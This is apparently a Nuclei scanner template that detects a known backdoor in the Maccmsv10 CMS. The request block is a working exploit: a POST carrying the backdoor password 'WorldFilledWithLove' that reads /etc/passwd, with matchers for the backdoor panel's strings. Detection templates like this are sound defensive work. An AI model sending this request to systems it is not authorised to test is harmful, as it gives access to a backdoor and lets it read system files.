id: maccmsv10-backdoor

info:
  name: Maccmsv10 - Backdoor Remote Code Execution
  author: princechaddha
  severity: critical
  description: Maccmsv10 contains a backdoor which can be exploited by remote attackers. The backdoor is accessible via the '/index.php/bbs/index/download' endpoint and the special 'getpwd' parameter value of 'WorldFilledWithLove'. Exploitation of this vulnerability will allow remote attackers to execute code.
  reference:
    - https://github.com/chaitin/xray/blob/master/pocs/maccmsv10-backdoor.yml
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 1
  tags: maccmsv10,rce,backdoor

http:
  - method: POST
    path:
      - "{{BaseURL}}/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1"

    body: "getpwd=WorldFilledWithLove"

    headers:
      Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "扫描后门"
          - "反弹端口"
          - "文件管理"
        condition: and

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100dd2bcec6cb513d21aef0e621346a44dec5447fd6ba0e17262b16b9d64d3a521002200bfdd41f743932e8b7de0a3373f0b4e37aa2c130a66f2d64cba62878097ce61f:922c64590222798bb761d5b6d8e72950
